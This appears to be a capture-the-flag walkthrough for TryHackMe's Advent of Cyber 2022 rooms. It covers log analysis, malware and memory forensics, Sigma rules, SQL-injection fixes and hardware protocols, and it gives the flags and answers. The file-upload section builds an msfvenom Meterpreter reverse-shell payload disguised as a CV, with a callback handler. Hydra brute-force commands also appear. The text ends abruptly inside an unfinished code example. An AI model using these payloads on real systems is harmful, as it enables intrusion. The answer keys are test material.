NIST Cybersecurity Framework: The Cybersecurity Framework (CSF) was developed by the National Institute of Standards and Technology (NIST), and it provides detailed guidance for organizations to manage and reduce cybersecurity risk.
The framework focuses on five essential functions: Identify -> Protect -> Detect -> Respond -> Recover.
With these functions, the framework allows organizations to prioritize their cybersecurity investments and engage in continuous improvement towards a target cybersecurity profile.
Complete the Exercise to get the Flag!!
Ans: Answer is in the Below Photo
2. What’s the flag that they left behind?
Ans: THM{IT'S A Y3T1 CHR1$TMA$}
1. Use the ls command to list the files present in the current directory. How many log files are present?
First of all, connect to the machine or the AttackBox.
Then type the ls command to list the files and folders.
Ans: 2
2. Elf McSkidy managed to capture the logs generated by the web server. What is the name of this log file?
Ans: webserver.log
3. Begin investigating the log file from question #3 to answer the following questions.
Ans: No Answer Needed
4. On what day was Santa’s naughty and nice list stolen?
Let's investigate the file with grep
cat webserver.log | grep "friday"
Ans: friday
5. What is the IP address of the attacker?
As the Log File Displays the IP of Attacker
Ans: 10.10.249.191
6. What is the name of the important list that the attacker stole from Santa?
cat webserver.log | grep santa
Ans: santaslist.txt
7. Look through the log files for the flag. The format of the flag is: THM{}
grep -r "THM"
Ans: The Answer is in the Above Image
8. Interested in log analysis? We recommend the Windows Event Logs room or the Endpoint Security Monitoring Module.
Ans: No Answer Needed
Before answering the questions, let's enumerate the machine using nmap
nmap -sC -sV -Pn <Machine_Ip>
Ans : Apache
2. What is the name of the service running on port 22 on the QA server?
Ans : ssh
3. What flag can you find after successfully accessing the Samba service?
Note: SMB or Samba 3.0.20 is potentially vulnerable to command execution for default users like root, admin and guest.
Open the Attack box, then Files, and Type
smb://<machine-ip>/
Find the Username and Password Here
Ans : Answer is in the Above Image
4. What is the password for the username santahr?
Open the Userlist
Ans : Answer is in the Above Image
Let’s Start the Machine and Enumerate the Machine using nmap
sudo nmap -sS -sV <machine-ip>
MACHINE_IP. What is the password?
Let's use Hydra to crack the password!!
Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the passwords of network services
VNC servers do not need a username to crack with Hydra, so we give it the default password list rockyou.txt and the server address.
hydra -P /usr/share/wordlists/rockyou.txt vnc://<Machine-Ip> -V
Ans: 1q2w3e4r
2. Using a VNC client on the AttackBox, connect to the target of the IP address MACHINE_IP. What is the flag written on the target's screen?
We found the Password, so let’s try Connecting the Machine with the Password
Open Connections in Linux and Type the IP of the Machine
Enter the Password we found!!
Ans: Flag is in the Above Picture
Click Split view in the top and open the File in the Machine
Ans: Answer is in the Above image --> (From: )
2. What is the return address?
Ans: Answer is in the Above Image
3. On whose behalf was the email sent?
Answer is in the Above Image
Ans: Chief elf
4. What is the X-spam score?
Answer is in the Above Image
Ans: 3
5. What is hidden in the value of the Message-ID field?
We have to Decode the base64 String
Ans: AoC2022_Email_Analysis
6. Visit the email reputation check website provided in the task. What is the reputation result of the sender's email address?
Open the Website emailrep
Ans: Risky
7. Check the attachments. What is the filename of the attachment?
For Further Investigations, I’m Sending the File from Remote machine to my Machine!!
Sender — Remote Machine
Receiver — My Machine
Ans: Answer is in the Above Image (filename: )
8. What is the hash value of the attachment?
Use this analyser to analyse the .eml file
You will get the Hash
Ans: Answer is in the Above Image
9. Visit the Virus Total website and use the hash value to search. Navigate to the behavior section. What is the second tactic marked in the Mitre ATT&CK section?
Open Virustotal and Search for the hash
Ans: Answer is in the Above Image (2nd Subtitle)
10. Visit the InQuest website and use the hash value to search. What is the subcategory of the file?
Open Inquest and Click Indicator Lookup and Search with the Hash
Ans: Macro_hunter
Ans: flag{411_ur_37h_15_m1n3}
Ans: THM{5_star_Fl4gzzz}
Ans: Answer is in the Video
Let’s Use Volatility for the Investigation!!
Volatility is a powerful tool used for analyzing memory dumps on Linux, Mac, and Windows systems.
You can download the Volatility tool Here!!
Note: this initial scan may take up to 10 minutes to complete. Why not grab some water or stretch your legs?
Scan the image for information-gathering purposes by using the command below,
python3 vol.py -f workstation.vmem windows.info
The Above scan will provide the basic Details from the Image.
We got the Results!
Ans: 10
python3 vol.py -f workstation.vmem windows.pslist
The pslist plugin in Volatility scans and displays the process list from a memory dump or image
Ans: mysterygift.ex
We already found the PID in the above question!!
Ans: 2040
Now let's dump the files used by that PID with the command below,
python3 vol.py -f workstation.vmem windows.dumpfiles --pid 2040
Ans: 16
Start the Machine and get into it
Let’s Open the File with Detect It Easy
Detect It Easy, abbreviated “DIE”, is a program for determining types of files.
“DIE” is a cross-platform application; apart from the Windows version, there are also versions for Linux and Mac OS.
Hence it is a 64-bit Architecture!!!
Ans: 64-bit
Analyse the above image!
Ans: upx
Let’s use capa to Analyse the file
capa detects capabilities in executable files. You run it against a PE, ELF, .NET module, or shellcode file and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate.
capa -vv mysterygift
Ans: nim
Ans: 2
Here we want to open the Process Monitor at the Bottom of the Screen
Add the Process name as mysterygift.exe and click Add
Change the File Extension into exe
Now notice the Process Monitor
We only need the RegCreateKey operation, so include it, or exclude the unnecessary operations listed below:
Right-click and click Exclude!!
You may observe that only one Registry Key has both RegCreateKey and RegSetValue. This key is related to a persistence technique called Registry Run Key Modification and is commonly used by malware developers to install a backdoor.
Ans: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Double-click the Results we Found
Ans: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wishes.bat
Click on the Folder Filter at the top right in the Below Image,
Include only the CreateFile Operation
Ans: test.jpg, wishes.bat
Add the Below Filter and Search for the Domain
Here we can see, the 2 Domains in Network Activity are
Ans: bestfestivalcompany.thm, virustotal.com
Use the Below Command on CMD!
cd "Desktop\Malware Sample"
floss -n 6 mysterygift.exe | grep http://
Or You Can Use Detect It Easy to Find the Strings in the EXE
Ans: http://bestfestivalcompany.thm/favicon.ico
Start your Machine and Navigate into it
View the “Protocol Hierarchy” menu.
Drag and drop the pcap file into Wireshark and navigate to Statistics → Protocol Hierarchy
Ans: 0.3
As we know TCP has Received more than 1000 Packets
View the “Conversations”
Navigate to Statistics → Conversations and Choose TCP
Ans: 3389
Ans: RDP
Filter the DNS packets.
Follow the Same for other Packets
The defanged URLs (via CyberChef) are below
Ans: bestfestivalcompany[.]thm,cdn[.]bandityeti[.]thm
Filter the HTTP packets.
Apply the http filter
Files in alphabetical order and in defanged format (by CyberChef)
Ans: favicon[.]ico,mysterygift[.]exe
The source is the host that downloads the file in this case!!
The IP below is in defanged format!
Ans: 10[.]10[.]29[.]186
Right-click on the packet with the GET request for mysterygift.exe and click Follow → HTTP Stream
Ans: cdn[.]bandityeti[.]thm
Right-click on the packet of the non-executable file and follow the HTTP stream
Ans: Nim httpclient/1.6.8
Export objects from the PCAP file.
Calculate the file hashes.
Click File→Export Objects-> HTTP and save the File as it is
Now open Terminal and Type the Command!! (Navigate to the File if Needed)
sha256sum mysterygift.exe
Ans: 0ce160a54d10f8e81448d0360af5c2948ff6a4dbb493fe4be756fc3e2c3f900f
Search the hash value of the executable file on Virustotal. Navigate to the “Behaviour” section. There are multiple IP addresses associated with this file.
Open the Virustotal website and Search for the Hash
Click the Behaviour tab and Scroll below to Find IP
The IPs are given in defanged format and alphabetical order without spaces; we don't need 8.8.8.8 (Google's DNS server)
The Challenge is Updated, So One More IP is Added with it
Ans: 20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76
As this webpage has an IDOR vulnerability, let's change the parameters
Ans: 134
Right Click the Image and Click Open Image in new tab
Change the Image Parameter from 100–107
Ans: THM{CLOSE_THE_DOOR}
Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems.
Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation.
Start the Machine and Paste the IP of the Machine into a Browser!
If Needed, Connect with the TryHackMe’s VPN
With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content — up to and including injecting malicious webpages, which lead to further vulnerabilities such as Cross-Site Scripting (XSS) or Cross-Site Request Forgery (CSRF)
Ans: Unrestricted
Ans: Santasidekick2
Just Upload a Dummy File!!
cv-username.exe CV file uploaded!! Santa’s team will review your CV and get in touch! Since Santa believes in Strong Security, the file has been stored outside the web root. No unethical elves allowed!
The Above Message ensures that a Person will Review the File, So we can Upload a Payload and wait for the Interaction
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-MACHINE-IP> LPORT=8080 -f exe -o cv-username.exe
Let’s Start the Reverse Handler!!
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <YOUR-MACHINE-IP>; set LPORT 8080; exploit"
Let’s Upload the Payload we Created in Home Directory to the Website and Wait for the Interaction!!
We Got the Reverse Connection!!
Now Let’s Exploit
We are in the system32 Directory so, let’s move back to C: Directory
cd ..
cd ..
cd Users
cd HR_Elf
cd Documents
cat flag.txt
Ans: THM{Naughty.File.Uploads.Can.Get.You.RCE}
To ensure that only specific file types can be uploaded, we can verify the file extension. This will allow us to limit the type of files that can be uploaded.
Ans: file Extension validation
Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.
To counter these attempts, we can rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name.
Ans: File Renaming
There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!
In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file
Ans: Malware Scanning
Open the Link by Adding your Machine IP — http://<Machine-IP>.p.thmlabs.com/
Credentials:
We can reasonably assume that the website expects an integer id to be sent. To avoid injections, we can convert whatever the user inputs in the id parameter to an integer. For this purpose, we will be using the intval() function. This function takes a string and tries to convert it into an integer. If no valid integer is found in the string, it returns 0, which is also an integer.
Let's open search-toys.php and change the parameters.
Change $_GET['id'] to intval($_GET['id']) everywhere in the elf.php file.
Ans: THM{McCode, Elf McCode}
First, we will modify our initial query by replacing any parameter with a placeholder indicated with a question mark (?). This will tell the database we want to run a query that takes two parameters as inputs. The query will then be passed to the mysqli_prepare() function instead of our usual mysqli_query(). mysqli_prepare() will not run the query yet but will indicate to the database to prepare the query with the given syntax. This function will return a prepared statement.
MySQL needs to know the value to put on each placeholder we defined before. So we can use the mysqli_stmt_bind_param() function to attach variables to each placeholder. This function requires you to send two parameters!!
The first parameter should be a reference to the prepared statement to which to bind the variables.
The second parameter is a string composed of one letter per placeholder to be bound, where letters indicate each variable's data type. Since we want to pass two strings, we put "ss" in the second parameter, where each "s" represents a string-typed variable. You can also use the letters "i" for integers or "d" for floats.
$q = "%".$_GET['q']."%";
$query="select * from toys where name like ? or description like ?";
$stmt = mysqli_prepare($db, $query);
mysqli_stmt_bind_param($stmt, 'ss', $q, $q);
mysqli_stmt_execute($stmt);
$toys_rs=mysqli_stmt_get_result($stmt);
Ans: THM{KodeNRoll}
We also have to change the parameters here on toys.php:
Change $_GET['id'] to intval($_GET['id']) everywhere in the toys.php file.
Ans: THM{Are we secure yet?}
Add the username and password parameters with a placeholder indicated by a question mark (?); the rest is the same as in the 2nd question. We pass the username and password variables to mysqli_stmt_bind_param() and execute the statement!!
Modify the above code as in the code below!!
<?php
require_once("connection.php");
session_start();
if(isset($_POST['username']) && isset($_POST['password'])){
    $username=$_POST['username'];
    $password=$_POST['password'];
    // Placeholders keep the user input out of the SQL text; the values are bound below.
    $query="select * from users where username=? and password=?";
    $stmt = mysqli_prepare($db, $query);
    mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
    mysqli_stmt_execute($stmt);
    $users_rs=mysqli_stmt_get_result($stmt);
    // ... the rest of the login handling stays as it was
}
Now, Run!!
Ans: THM{SQLi_who???}
HTML5's built-in features help a lot with the validation of user-provided input, minimizing the need to rely on JavaScript for the same objective.
The <input> element specifically has an array of very helpful capabilities centered around form validation.
The <input> type, which can be set to specifically filter for an email, a URL, or even a file, among others, promptly checks whether or not the user-provided input fits the type of data that the form is asking for, and so feedback on its validity is immediately returned to the user.
For even more granular control of the input being provided, regular expressions (regex) can be integrated into the mix. Simply use one in the "pattern" attribute within the <input> element and you're all set.
Here is a nice resource to get started with regular expressions. A couple of examples are shown below.
1. <input type="text" id="uname" name="uname" pattern="[a-zA-Z0-9]+">
2. <input type="email" id="email" name="email" pattern=".+@0dayinventions\.com">
Start the machine, navigate into the RegExPractice folder and then right-click → Open in Terminal
We Have to use the Regular Expressions as per their Structure for Username
9z8yMc9T
31337aq
39C3qxP
R6fUTY2nC8
9Qe5f4
User35
u3Y73h3
5Xze553j
Ans: 8
Ans: User35
egrep '.+@.+\.com' strings
br33zy@gmail.com
lewisham44@amg.com
johnny.the.sinner@yahoo.com
badyeti@gmail.com
maxximax@fedfull.com
jklabada@tryhackme.com
johnny.the.sinner@yahoo.com
hunter4k@canary.com
hussain.volt@hotmail.com
marckymarc@tryhackme.com
batteryvoltas@alfa.com
Ans: 11
Ans: 8
Ans: amg.com
Ans: fedfull.com
Ans: hussain.volt
egrep '^http(s)?.{3}(www)?.+\..+$' strings
http://www.sample.net/blood?ghost=force
http://keebler.com/dicta-tempore-id-dolores-blanditiis-ut.html
http://koch.com/quae-perspiciatis-non-unde-quo
http://johns.net/nisi-quis-dolorum-et-rerum
https://www.sample.edu/#fire
http://www.sample.info/?mint=trouble&action=move
https://www.sample.org/?quiet=expansion&grip=eggnog
http://spencer.com/sapiente-tempore-omnis-a-est-aut-atque-pariatur
http://pfeffer.biz/nulla-non-facilis-incidunt-necessitatibus-velit-inventore
https://www.kertzmann.com/possimus-ullam-consequatur-itaque-sed-modi-aliquam
https://www.sample.com/?air=color&cave=judge#shake
http://schinner.com/quia-vitae-qui-explicabo-provident-minima-ratione.html
https://runolfsson.com/esse-ab-rerum-et-quis-aut.html
https://www.moen.com/explicabo-exercitationem-culpa-et-eum-temporibus
https://horse.sample.com/shape/company?mom=collar#donkey
http://batz.com/reprehenderit-voluptate-id-soluta-tenetur
Ans: 16
Count the number of URLs that start with https
Ans: 7
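As an added example (not part of the write-up), the following Python runs the page's two egrep patterns over the strings listed above and contrasts that line-oriented search with the whole-value check a browser applies to the `pattern` attribute; the STRINGS list is a constructed stand-in for the RegExPractice file, built from the values shown above plus two noise lines.

```python
"""Added example, not from the write-up: run the page's egrep patterns over
the strings listed above and contrast them with an HTML pattern-attribute
check, which must match the whole value rather than a substring."""
import re

# Constructed stand-in for the RegExPractice 'strings' file: the usernames,
# e-mail addresses and URLs the page lists, plus two noise lines.
STRINGS = """\
some random line without anything useful
9z8yMc9T
31337aq
39C3qxP
R6fUTY2nC8
9Qe5f4
User35
u3Y73h3
5Xze553j
br33zy@gmail.com
lewisham44@amg.com
johnny.the.sinner@yahoo.com
badyeti@gmail.com
maxximax@fedfull.com
jklabada@tryhackme.com
johnny.the.sinner@yahoo.com
hunter4k@canary.com
hussain.volt@hotmail.com
marckymarc@tryhackme.com
batteryvoltas@alfa.com
http://www.sample.net/blood?ghost=force
http://keebler.com/dicta-tempore-id-dolores-blanditiis-ut.html
http://koch.com/quae-perspiciatis-non-unde-quo
http://johns.net/nisi-quis-dolorum-et-rerum
https://www.sample.edu/#fire
http://www.sample.info/?mint=trouble&action=move
https://www.sample.org/?quiet=expansion&grip=eggnog
http://spencer.com/sapiente-tempore-omnis-a-est-aut-atque-pariatur
http://pfeffer.biz/nulla-non-facilis-incidunt-necessitatibus-velit-inventore
https://www.kertzmann.com/possimus-ullam-consequatur-itaque-sed-modi-aliquam
https://www.sample.com/?air=color&cave=judge#shake
http://schinner.com/quia-vitae-qui-explicabo-provident-minima-ratione.html
https://runolfsson.com/esse-ab-rerum-et-quis-aut.html
https://www.moen.com/explicabo-exercitationem-culpa-et-eum-temporibus
https://horse.sample.com/shape/company?mom=collar#donkey
http://batz.com/reprehenderit-voluptate-id-soluta-tenetur
another noise line: version 1.6.8
""".splitlines()

EMAIL_RE = r".+@.+\.com"                  # the page's egrep pattern for e-mails
URL_RE = r"^http(s)?.{3}(www)?.+\..+$"    # the page's egrep pattern for URLs


def egrep(pattern: str, lines) -> list:
    """Line-oriented substring search, i.e. what `egrep PATTERN file` prints."""
    return [ln for ln in lines if re.search(pattern, ln)]


def email_stats(lines):
    """(matching lines, distinct domains, local part of the hotmail.com address)."""
    emails = egrep(EMAIL_RE, lines)
    domains = {e.rsplit("@", 1)[1] for e in emails}
    hotmail = [e.split("@")[0] for e in emails if e.endswith("@hotmail.com")]
    return len(emails), len(domains), hotmail[0] if hotmail else None


def url_stats(lines):
    """(number of URLs, number of URLs that start with https)."""
    urls = egrep(URL_RE, lines)
    return len(urls), sum(1 for u in urls if u.startswith("https"))


def html_pattern_ok(pattern: str, value: str) -> bool:
    """Approximate the <input pattern="..."> check: the browser anchors the
    pattern to the entire value, so a match somewhere inside is not enough."""
    return re.fullmatch(pattern, value) is not None


if __name__ == "__main__":
    print(email_stats(STRINGS), url_stats(STRINGS))
    # grep-style search accepts a look-alike domain; the anchored check does not.
    print(egrep(r".+@0dayinventions\.com", ["x@0dayinventions.com.evil.example"]))
    print(html_pattern_ok(r".+@0dayinventions\.com", "x@0dayinventions.com.evil.example"))
```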
Cyber threats and criminals have advanced tactics to ensure that they steal information and cause havoc. As you have already seen through the previous days, there are many ways in which this can be done.
There are also ways for security teams to prepare their defences and identify these threats. What would be evident is that most of the blue-team activities will require proactive approaches to analysing different logs, malware and network traffic. This brings about the practice of threat detection.
Open the Machine’s IP Address in a Browser (Make sure you Connected with TryHackMe’s VPN)
Account Creation Technique Requires
title: Local Account Creation
id: 1
status: experimental # test, stable, deprecated, unsupported.
description:
author:
date:
modified: 1
logsource:
  product: windows
  service: security
  category: # firewall, web, antivirus, process_creation, network_connection, file_access.
detection:
  selection:
    EventID: 4720
  condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.
falsepositives: # Legitimate services or use.
level: low
tags: # Associated TTPs from MITRE ATT&CK
  - {attack.tactic} # MITRE Tactic
  - {attack.technique} # MITRE Technique
Ans: THM{n0t_just_your_u$ser}
Click on the View Log button and search for the user account
Ans: BanditYetiMini
We have to create a new rule for Software Discovery, and it requires
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
title:
id: # UUID
status: # experimental, test, stable, deprecated, unsupported.
description:
author:
date:
modified:
logsource:
  product: windows
  service: sysmon
  category: process_creation
detection:
  selection:
    EventID:
      - 1
    Image|endswith:
      - reg.exe
    CommandLine|contains|all:
      - reg
      - query
      - /v
      - svcVersion
  condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.
falsepositives: # Legitimate services or use.
level: # informational, low, medium, high or critical.
tags: # Associated TTPs from MITRE ATT&CK
  - {attack.tactic} # MITRE Tactic
  - {attack.technique} # MITRE Technique
Ans: THM{wh@t_1s_Runn1ng_H3r3}
Open the log file so we can get the path of the USER
Ans: SIGMA_AOC2022\Bandit Yeti
Let’s Create a Rule for Scheduled Task and it Requires
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
title:
id: # UUID
status: # experimental, test, stable, deprecated, unsupported.
description:
author:
date:
modified:
logsource:
  product: windows
  service: sysmon
  category: process_creation
detection:
  selection:
    EventID: 1
    Image|endswith:
      - schtasks.exe
    CommandLine|contains|all:
      - schtasks
      - /create
  condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.
falsepositives: # Legitimate services or use.
level: # informational, low, medium, high or critical.
tags: # Associated TTPs from MITRE ATT&CK
  - {attack.tactic} # MITRE Tactic
  - {attack.technique} # MITRE Technique
Ans: THM{sch3dule_0npo1nt_101}
Open the Log file for Hashes
Ans: 2F6CE97FAF2D5EEA919E4393BDD416A7
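Added example, not from the room or the Sigma project: a minimal Python evaluator for the `selection` blocks of the three rules above, run over constructed Sysmon (Event ID 1) and Security (Event ID 4720) events, including two benign look-alikes that must not fire. Only the modifiers those rules use (`endswith`, `contains|all`) plus plain equality are implemented.

```python
"""Added example, not from the page: a minimal evaluator for the 'selection'
blocks of the three Sigma rules above, run over constructed events.  Matching
is case-insensitive, as Sigma specifies for string values."""

# The three selections, transcribed from the rules above.
RULES = {
    "Local Account Creation": {"EventID": 4720},
    "Software Discovery": {
        "EventID": [1],
        "Image|endswith": ["reg.exe"],
        "CommandLine|contains|all": ["reg", "query", "/v", "svcVersion"],
    },
    "Scheduled Task Creation": {
        "EventID": 1,
        "Image|endswith": ["schtasks.exe"],
        "CommandLine|contains|all": ["schtasks", "/create"],
    },
}

# Constructed events carrying only the fields the rules reference.
EVENTS = [
    {"EventID": 4720, "TargetUserName": "BanditYetiMini",
     "SubjectUserName": "Administrator"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion',
     "User": r"SIGMA_AOC2022\Bandit Yeti"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"'},
    # Benign look-alikes that must not fire: a reg add, and a task listing.
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add HKCU\Software\Example /v Setting /d 1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /query /fo LIST"},
]


def _as_list(value):
    return value if isinstance(value, list) else [value]


def field_matches(field_spec: str, wanted, event: dict) -> bool:
    """Evaluate one 'Field|modifier|...' entry of a selection against an event."""
    name, *mods = field_spec.split("|")
    if name not in event:
        return False
    actual = str(event[name]).lower()
    wanted = [str(w).lower() for w in _as_list(wanted)]
    if "endswith" in mods:
        hits = [actual.endswith(w) for w in wanted]
    elif "startswith" in mods:
        hits = [actual.startswith(w) for w in wanted]
    elif "contains" in mods:
        hits = [w in actual for w in wanted]
    else:
        hits = [actual == w for w in wanted]
    # A list of values is OR-ed unless the 'all' modifier is present.
    return all(hits) if "all" in mods else any(hits)


def matches_selection(selection: dict, event: dict) -> bool:
    """Every field in a selection map must match (implicit AND)."""
    return all(field_matches(f, w, event) for f, w in selection.items())


def run_rules(rules: dict, events: list) -> list:
    """Return (rule title, event index) for every rule/event pair that fires."""
    return [(title, i)
            for i, ev in enumerate(events)
            for title, sel in rules.items()
            if matches_selection(sel, ev)]


if __name__ == "__main__":
    for title, idx in run_rules(RULES, EVENTS):
        print(f"{title}: event {idx} -> {EVENTS[idx].get('CommandLine', EVENTS[idx])}")
```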
Let’s enter the world of 0s and 1s. This then begs the question, how does hardware take electricity and generate signals? In this task, we will focus on digital communication.
For hardware communication, we use a device called a Logic Analyser to analyse the signals. This device can be connected to the actual electrical wires that are used for communication between two devices that will capture and interpret the signals being sent.
USART
Universal Synchronous/Asynchronous Receiver-Transmitter (USART) communication, or as it is better known, serial communication, is a protocol that uses two wires.
One wire is used to transmit (TX) data from device A to device B, and the other wire is used to receive (RX) data on device A from device B. In essence, we connect the transmit port from one device to the receive port from the other device and vice versa.
SPI
The Serial Peripheral Interface (SPI) communication protocol is mainly used for communication between microprocessors and small peripherals such as a sensor or an SD card.
While USART communication has the clock built into the TX and RX lines, SPI uses a separate clock wire. Separating the clock (SCK) from the data (DATA) line allows for synchronous communication, which is faster and more reliable.
I2C
The Inter-Integrated Circuit (I2C) communication protocol was created to deal with the drawbacks of both the USART and SPI communication protocols. Because USART is asynchronous and has the clock built into the transmit and receive lines, devices have to agree ahead of time on the configuration of communication.
Furthermore, speeds are reduced to ensure communication remains reliable.
On the other hand, while SPI is faster and more reliable, it requires many more wires for communication, and every single additional peripheral requires one more Chip Select wire.
For hardware communication, we use a device called a Logic Analyser to analyze the signals.
This device can be connected to the actual electrical wires that are used for communication between two devices that will capture and interpret the signals being sent.
Ans: logic analyser
USART communication has the clock built into the TX and RX lines, but SPI uses a separate clock wire.
Separating the clock (SCK) from the data (DATA) line allows for synchronous communication, which is faster and more reliable. So the trade-off is adding an additional wire, but we gain a speed and reliability boost.
Ans: Nay
Universal Synchronous/Asynchronous Receiver-Transmitter (USART) communication, or as it is better known, serial communication, is a protocol that uses two wires.
One wire is used to transmit (TX) data from device A to device B, and the other wire is used to receive (RX) data on device A from device B
Ans: Yea
The Inter-Integrated Circuit (I2C) communication protocol was created to deal with the drawbacks of both the USART and SPI communication protocols.
Because USART is asynchronous and has the clock built into the transmit and receive lines, devices have to agree ahead of time on the configuration of communication.
Furthermore, speeds are reduced to ensure communication remains reliable.
Ans: Nay
While SPI is faster and more reliable, it requires many more wires for communication, and every single additional peripheral requires one more Chip Select wire.
I2C attempts to solve these problems. Similar to USART, I2C only makes use of two lines for communication. I2C uses a Serial Data (SDA) line and Serial Clock (SCL) line for communication.
Ans: Nay
SPI is Faster and more reliable than I2C
Ans: Yea
An external clock line is used, communication is still faster and more reliable than USART, and while it is slightly slower than SPI, the use of the Address signal means up to 1008 devices can be connected to the same two lines and will be able to communicate.
Ans: 1008
Open the Remote Machine’s Split View
Open the Logic 2.4.2 Application and open the Capture — santa
Click the Analyzers and add an Async Serial Analyser and Give Input Channel as Channel 1 and Baud/Bit rate as 4800
Ans: 9600
Add Another Async serial Analyser and Give Input channel as Channel 0 and Baud/Bit Rate as 9600
Ans: THM{Hacking.Hardware.Is.Fun}
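An added example, not part of the write-up, to show why the baud rate matters in the Logic 2 exercise above: it builds a sampled 8N1 UART capture for a constructed message and decodes it at 9600 and at 4800 baud. The sample rate, the message and the framing (one start bit, 8 data bits LSB first, one stop bit, idle high) are assumptions.

```python
"""Added example, not part of the write-up: build a sampled asynchronous serial
(UART) capture for a constructed message and decode it at the right and the
wrong baud rate.  Assumed framing: 8N1, LSB first, idle line high."""

SAMPLE_RATE = 96_000          # constructed logic-analyser sample rate (Hz)


def encode_uart(message: bytes, baud: int, sample_rate: int = SAMPLE_RATE) -> list:
    """One 0/1 value per capture sample for `message` transmitted at `baud`."""
    spb = sample_rate // baud                      # samples per bit
    samples = [1] * spb                            # idle before the first frame
    for byte in message:
        bits = [0] + [(byte >> i) & 1 for i in range(8)] + [1]   # start, d0..d7, stop
        for bit in bits:
            samples.extend([bit] * spb)
        samples.extend([1] * spb)                  # one bit of idle between frames
    return samples


def decode_uart(samples, baud: int, sample_rate: int = SAMPLE_RATE):
    """Decode 8N1 frames by sampling the centre of each bit period after a
    falling start edge.  Returns (decoded bytes, framing-error count).  With the
    wrong baud the bit centres land in the wrong places and the output is garbage."""
    spb = sample_rate / baud
    out, framing_errors, i = bytearray(), 0, 1
    while i < len(samples):
        if samples[i - 1] == 1 and samples[i] == 0:            # start-bit edge
            centres = [i + int((k + 0.5) * spb) for k in range(10)]
            if centres[-1] >= len(samples):
                break                                          # truncated frame
            bits = [samples[c] for c in centres]
            out.append(sum(bit << k for k, bit in enumerate(bits[1:9])))
            framing_errors += bits[9] != 1                      # stop bit must be high
            i += int(10 * spb)                                  # skip past the stop bit
        else:
            i += 1
    return bytes(out), framing_errors


def estimate_baud(samples, sample_rate: int = SAMPLE_RATE) -> int:
    """Autobaud the way an analyser does: the shortest run of identical samples
    is one bit period, so baud = sample_rate / shortest run."""
    runs, run = [], 1
    for prev, cur in zip(samples, samples[1:]):
        if cur == prev:
            run += 1
        else:
            runs.append(run)
            run = 1
    return round(sample_rate / min(runs))


if __name__ == "__main__":
    capture = encode_uart(b"THM", 9600)
    print("at 9600:", decode_uart(capture, 9600))   # (b'THM', 0)
    print("at 4800:", decode_uart(capture, 4800))   # garbage, as in the wrong analyser setting
    print("autobaud:", estimate_baud(capture))      # 9600
```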
What is Firmware Reverse Engineering?
Every embedded system, such as cameras, routers, smart watches etc., has pre-installed firmware, which has its own set of instructions running on the hardware’s processor.
It enables the hardware to communicate with other software running on the device. The firmware provides low-level control for the designer/developer to make changes at the root level.
Firmware Reversing Steps
BinWalk: A firmware extraction tool that extracts code snippets inside any binary by searching for signatures against many standard binary file formats like zip, tar, exe, ELF, etc. Binwalk has a database of binary header signatures against which the signature match is performed.
The common objective of using this tool is to extract a file system like Squashfs, yaffs2, Cramfs, ext*fs, jffs2, etc., which is embedded in the firmware binary. The file system has all the application code that will be running on the device.
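Added example (not from the page or from binwalk) of the signature scan described above: a toy scanner over a constructed firmware-like blob, with header validation for Squashfs and gzip hits so that text which merely contains the magic is reported as a false positive, and a carve of the embedded gzip member. The signature table and the image are constructed.

```python
"""Added example, not from the page or from binwalk: a toy signature scanner
showing what binwalk does when it matches file-format magic inside a firmware
blob, and why a raw magic hit needs header validation before extraction."""
import gzip
import struct
import zlib

# Magic bytes -> description: a tiny stand-in for binwalk's signature database.
SIGNATURES = {
    b"\x7fELF": "ELF executable",
    b"\x1f\x8b\x08": "gzip compressed data",
    b"hsqs": "Squashfs filesystem, little endian",
    b"PK\x03\x04": "Zip archive",
    b"-----BEGIN PGP": "PGP armored data",
}


def valid_squashfs(blob: bytes, pos: int) -> bool:
    """Check the v4 superblock fields after the magic: block_log must equal
    log2(block_size) and the major version must be 4.  Text that merely
    contains 'hsqs' fails this and is reported as a false positive."""
    if pos + 32 > len(blob):
        return False
    (_magic, _inodes, _mtime, block_size, _frags, _comp, block_log,
     _flags, _ids, vmajor, _vminor) = struct.unpack_from("<4sIIIIHHHHHH", blob, pos)
    return vmajor == 4 and block_log < 32 and (1 << block_log) == block_size


def valid_gzip(blob: bytes, pos: int) -> bool:
    """Reserved FLG bits (5-7) must be zero in a real gzip member header."""
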